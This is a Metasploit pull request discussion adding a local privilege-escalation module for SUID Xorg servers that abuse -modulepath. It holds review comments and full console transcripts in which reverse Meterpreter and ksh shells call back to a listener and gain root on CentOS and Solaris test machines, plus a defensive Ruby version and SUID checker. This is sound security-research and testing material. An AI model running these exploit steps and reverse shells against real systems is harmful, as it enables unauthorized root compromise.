
WIP Xorg x11 suid server modulepath #11025

Merged
merged 6 commits into from Oct 22, 2019

Conversation


@aringo aringo commented Nov 26, 2018

Using this version of the exploit there is no need to overwrite crontab, it works against SELinux, and it is near instant. I had some difficulties getting this to work on OpenBSD. Should I try to update the other one to use this method for Linux? Kind of burnt out on this exploit now so WIP 💯

  • Start msfconsole
  • get session
  • exploit/multi/local/xorg_x11_suid_server_modulepath
Module options (exploit/multi/local/xorg_x11_suid_server_modulepath):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.30.0.2       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux x64


msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.30.0.2:4444 
[*] Running additional check for Linux
[+] Console lock for peep
[+] Xorg path found at /usr/bin/Xorg
[+] Xorg binary /usr/bin/Xorg is SUID
[+] Xorg version 1.19.5 is vulnerable
[+] Xorg does not appear running
[+] gcc is installed
[+] Passed all initial checks for exploit
[*] Writing launcher
[*] Max line length is 65537
[*] Writing 145 bytes in 1 chunks of 524 bytes (octal-encoded), using printf
[*] compiling launcher
[*] Uploading your payload, this could take a while
[*] Max line length is 65537
[*] Writing 249 bytes in 1 chunks of 728 bytes (octal-encoded), using printf
[*] Exploiting
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (816260 bytes) to 172.30.0.61
[*] Meterpreter session 2 opened (172.30.0.2:4444 -> 172.30.0.61:55866) at 2018-11-25 19:31:39 -0600
[+] Deleted /tmp/CmduZk.c
[+] Deleted /tmp/libglx.so
[+] Deleted /tmp/.session-k0KBlQ1xT

meterpreter > shell 
Process 2299 created.
Channel 1 created.
id ; uname -a ; sestatus
uid=0(root) gid=0(root) groups=0(root),1000(peep) context=unconfined_u:unconfined_r:xserver_t:s0-s0:c0.c1023
Linux localhost.localdomain 3.10.0-862.el7.x86_64 #1 SMP Fri Apr 20 16:44:24 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
SELinux status:                 enabled
SELinuxfs mount:                /sys/fs/selinux
SELinux root directory:         /etc/selinux
Loaded policy name:             targeted
Current mode:                   enforcing
Mode from config file:          error (Inappropriate ioctl for device)
Policy MLS status:              enabled
Policy deny_unknown status:     allowed
Max kernel policy version:      31

@bcoles bcoles added the module, blocked (Blocked by one or more additional tasks) and needs-docs labels Nov 26, 2018

bcoles commented Nov 26, 2018

Have you looked at rapt0r's exploit for this bug on Solaris 11.4?


# linux checks
uname = cmd_exec "uname"
if uname =~ /linux/i
Contributor

This isn't necessary if you're only targeting Linux.

Contributor Author

This technique works on Solaris also, I'll open it up. It does not work on OpenBSD though.

xdisplay = datastore['Xdisplay']
sofile = "#{modulepath}/#{datastore['sofile']}"

stub = %Q^
Contributor

For Linux, you could use Metasm to dynamically compile the shared object, rather than relying on gcc to be on the box. Here's an example.

bcoles commented Apr 21, 2019

Any luck with adding support for Solaris? There are a few examples of dealing with Solaris' insane $PATH issues for gcc and compiling a shared object in the exploits/solaris/local directory. Alternatively, I can take a look at implementing gcc for Solaris if you like.

Perhaps it would be better to get this landed and circle back later.

Should I try to update the other one to use this method for Linux?

I think it makes sense to keep the two vectors separate. Partly because they're exploited differently, but mostly because the module logic is already complex enough as a multi module.

@space-r7 space-r7 self-assigned this Oct 15, 2019
@space-r7
Hi @aringo! Do you mind if I try adding a Solaris target to your module? Thanks!

@space-r7
In the interest of getting this landed soon, I added support for Metasm, Solaris targets, and documentation.

@space-r7 space-r7 added docs and removed needs-docs labels Oct 22, 2019
@space-r7
Testing on Centos 7.4:

msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 172.16.215.1
lhost => 172.16.215.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.16.215.1:4444 
[*] Sending stage (816260 bytes) to 172.16.215.159
[*] Meterpreter session 1 opened (172.16.215.1:4444 -> 172.16.215.159:33178) at 2019-10-22 13:48:01 -0500

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.4.1708 (Linux 3.10.0-693.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/multi/local/xorg_x11_suid_server_modulepath 
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set session 1
session => 1
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set lhost 172.16.215.1
lhost => 172.16.215.1
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > check
[+]  The target is vulnerable.
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > run

[*] Started reverse TCP handler on 172.16.215.1:4444 
[+] Passed all initial checks for exploit
[*] Writing launcher and compiling
[*] Uploading your payload, this could take a while
[*] Exploiting
[*] Sending stage (816260 bytes) to 172.16.215.159
[*] Meterpreter session 2 opened (172.16.215.1:4444 -> 172.16.215.159:33180) at 2019-10-22 13:48:51 -0500
[+] Deleted /tmp/libglx.so
[+] Deleted /tmp/.session-qwQLbME

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.4.1708 (Linux 3.10.0-693.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

Testing on Solaris 11.4:

msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload cmd/unix/reverse_ksh
payload => cmd/unix/reverse_ksh
msf5 exploit(multi/handler) > set lhost 172.16.215.1
lhost => 172.16.215.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.16.215.1:4444 
[*] Command shell session 1 opened (172.16.215.1:4444 -> 172.16.215.159:33616) at 2019-10-22 14:06:33 -0500
[*] Command shell session 2 opened (172.16.215.1:4444 -> 172.16.215.152:39838) at 2019-10-22 14:06:33 -0500

whoami
space
id 
uid=100(space) gid=10(staff)
uname -a
SunOS solaris 5.11 11.4.0.15.0 i86pc i386 i86pc
background

Background session 2? [y/N]  y
msf5 exploit(multi/handler) > use exploit/multi/local/xorg_x11_suid_server_modulepath 
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set target 2
target => 2
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set session 2
session => 2
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set payload cmd/unix/reverse_ksh
payload => cmd/unix/reverse_ksh
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set lhost 172.16.215.1
lhost => 172.16.215.1
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > check

[!] SESSION may not be compatible with this module.
[+]  The target is vulnerable.
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.215.1:4444 
[+] Passed all initial checks for exploit
[*] Writing launcher and compiling
[*] Uploading your payload, this could take a while
[*] Exploiting
[*] Command shell session 3 opened (172.16.215.1:4444 -> 172.16.215.152:45033) at 2019-10-22 14:07:37 -0500
[+] Deleted /tmp/DhNrDYvoir.c
[+] Deleted /tmp/libglx.so
[+] Deleted /tmp/.session-ZnrESw

id
uid=0(root) gid=0(root)
uname -a
SunOS solaris 5.11 11.4.0.15.0 i86pc i386 i86pc

space-r7 added a commit that referenced this pull request Oct 22, 2019
@space-r7 space-r7 merged commit 1ceaa1d into rapid7:master Oct 22, 2019
@space-r7
Release Notes

This exploits a local privilege escalation vulnerability on targets running Xorg server versions from v1.19.0 to versions below v1.20.3. Vulnerable versions of Xorg have the SUID bit set and allow low-privileged users to start the server with the -modulepath flag. This allows a user to load and execute a shared object as root.
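As an added defender-side check, not part of the Metasploit module or this PR, the following Ruby script applies the two conditions stated in the release notes: it parses `Xorg -version` output, tests whether the version lies in the range from 1.19.0 up to (but not including) 1.20.3, and checks whether the binary is SUID root. The sample `Xorg -version` output embedded in it is constructed; the default path /usr/bin/Xorg is the one shown in the transcript above.

```ruby
#!/usr/bin/env ruby
# Added defensive check, not part of the Metasploit module:
# is the installed Xorg SUID root and in the vulnerable range
# (>= 1.19.0 and < 1.20.3) named in the release notes?
require 'rubygems' # Gem::Version gives correct version ordering

VULN_FROM = Gem::Version.new('1.19.0')
FIXED_IN  = Gem::Version.new('1.20.3')

# Extract the server version from `Xorg -version` output.
# Returns a Gem::Version, or nil if no version line is present.
def parse_xorg_version(output)
  m = output.match(/^X\.Org X Server (\d+\.\d+(?:\.\d+)?)/)
  m ? Gem::Version.new(m[1]) : nil
end

def version_in_vulnerable_range?(version)
  !version.nil? && version >= VULN_FROM && version < FIXED_IN
end

# True when the binary is owned by root and has the setuid bit,
# i.e. a low-privileged user can start it with root privileges.
def suid_root?(path)
  st = File.stat(path)
  st.setuid? && st.uid.zero?
rescue Errno::ENOENT, Errno::EACCES
  false
end

# Combine both conditions into a one-line verdict.
def xorg_verdict(version_output, suid)
  v = parse_xorg_version(version_output)
  return 'unknown: no X.Org version line found' if v.nil?
  return "patched: Xorg #{v} is outside the vulnerable range" unless version_in_vulnerable_range?(v)
  suid ? "vulnerable: Xorg #{v} is SUID root" : "mitigated: Xorg #{v} is in range but not SUID root"
end

# Constructed sample of `Xorg -version` output (only the first line matters).
SAMPLE_OUTPUT = <<~OUT
  X.Org X Server 1.19.5
  Release Date: 2017-10-12
  X Protocol Version 11, Revision 0
OUT

if __FILE__ == $PROGRAM_NAME
  path = ARGV[0] || '/usr/bin/Xorg'
  out = IO.popen([path, '-version'], err: [:child, :out], &:read) rescue ''
  puts xorg_verdict(out, suid_root?(path))
end
```

Run it as an unprivileged user on the host being audited; a "vulnerable" verdict means either upgrading Xorg past 1.20.3 or dropping the SUID bit removes the condition the module relies on.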

@bcoles bcoles added the rn-modules (release notes for new or majorly enhanced modules) label and removed the blocked (Blocked by one or more additional tasks) label Oct 24, 2019